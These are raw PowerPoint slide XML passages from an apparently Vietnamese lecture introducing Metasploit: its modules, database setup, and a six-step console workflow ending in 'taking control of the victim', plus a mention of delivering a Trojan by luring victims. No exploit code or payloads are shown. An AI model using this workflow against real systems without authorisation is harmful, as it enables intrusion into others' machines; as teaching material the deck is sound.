            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" i="1" smtClean="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627" y="1808163"/>
            <a:ext cx="6462195" cy="4572000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Slide Number Placeholder 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{317AADAE-BEA8-4761-9289-77A15DF9BE95}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>11</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2996560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45243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400" smtClean="0">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Thành phần: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Exploits</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>: Đây là chức năng chính của MSF, giúp ta thử nghiệm khai thác các lỗ hổng phần mềm. Mỗi một module cung cấp một phương thức khai thác, và được phân loại rõ ràng đối với từng hệ điều hành cũng như phiên bản phần mềm.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Auxiliaries</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>: Đây là chức năng mới được bổ sung từ phiên bản v3.0, bổ sung các module cho việc tìm kiếm, thu thập thông tin, thậm chí là dò tìm lỗ hổng (fuzzing) với các phần mềm.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Payloads</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>: Cung cấp các mã khai thác với các tùy chọn về ngôn ngữ (Ruby, C++, …), cách mã hóa, cách thực thi, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" i="1"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12</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3172565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646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" i="1" smtClean="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5877" y="2346017"/>
            <a:ext cx="2914688" cy="2188752"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1064301" y="2346017"/>
            <a:ext cx="6895475" cy="2677656"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-342900">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MSF hỗ trợ với cơ sở liệu PostgreSQL</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-342900">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Dùng để lưu trữ kết quả đã khai thác, dữ liệu đang khai thác.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-342900">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MSF </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>có thể chạy không cần cơ sở dữ liệu, nhưng nếu muốn lưu trữ, hay xem lại các kết quả thì hãy sử dụng cơ sở dữ liệu. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pP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317AADAE-BEA8-4761-9289-77A15DF9BE95}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>13</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2920262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2677656"/>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400" smtClean="0">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Phương pháp tấn công</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>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en-US" sz="2400">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Sử dụng module để dò quét và tấn công vào lỗ hổng bảo mật của victim. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Tạo mã độc (Trojan), rồi truyền vào mấy victim sau đó dẫn dụ victim kích hoạt nó</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>.	</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" i="1"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14</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="438537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4524315"/>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a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Sử dụng module để dò quét và tấn công lỗ hổng bảo mật</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400">
              <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Bước 1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Trước tiên chạy lệnh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" i="1" smtClean="0">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>service </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" i="1">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>postgresql </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" i="1" smtClean="0">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>start</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, sau đó khởi động Metasploit bằng lệnh msfconsole yêu cầu. Trường hợp lần đầu khởi động Metasploit: chạy thêm </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" i="1" smtClean="0">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>msfdb </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" i="1" smtClean="0">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>init</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400">
              <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Mỗi một lỗ hổng bảo mật được định nghĩa trong Metasploit thường có 2 module, một là cái auxiliary để quét xem máy victim có chứa lỗ hổng này không, hai là exploit để khai thác điều đó.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400">
              <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Bước 2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>: Search module lỗ hổng theo cú pháp </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" i="1">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>search [từ_khóa]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, nếu có module hệ thống sẽ trả về một đường dẫn dẫn tới module đó. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Bước 3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>: Dùng lệnh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" i="1">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>use [đường_dẫn_module]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> để sử dụng module.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" i="1"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15</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1956012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3046988"/>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a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Sử dụng module để dò quét và tấn công lỗ hổng bảo mật</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400">
              <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:endParaRPr lang="en-US" sz="2400" b="1" smtClean="0">
              <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" smtClean="0">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Bước </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>: Nhập lệnh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" i="1">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>show info </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>để xem thông tin, tùy chọn của module đó và thực hiện thiết lập.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Bước 5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>: Nhập lệnh exploit để thực hiện tấn công. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Bước 6</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>: Tấn công thành công, sẽ chiếm quyền điều khiển của victim. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" i="1" smtClean="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317AADAE-BEA8-4761-9289-77A15DF9BE95}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>16</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2744440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3" y="1"/>
            <a:ext cx="10802257" cy="1690688"/>
          </a:xfrm>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317AADAE-BEA8-4761-9289-77A15DF9BE95}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>17</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7899"/>
            <a:ext cx="12191999" cy="6840101"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2518729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3" y="1"/>
            <a:ext cx="10802257" cy="1690688"/>
          </a:xfrm>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317AADAE-BEA8-4761-9289-77A15DF9BE95}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>18</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680"/>
            <a:ext cx="12209883" cy="6964680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2641084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3" y="1"/>
            <a:ext cx="10802257" cy="1690688"/>
          </a:xfrm>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317AADAE-BEA8-4761-9289-77A15DF9BE95}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>19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8" y="1"/>
            <a:ext cx="12099704" cy="6886533"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3170345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4063"/>
            <a:ext cx="9144000" cy="1023937"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="5000" err="1" smtClean="0">
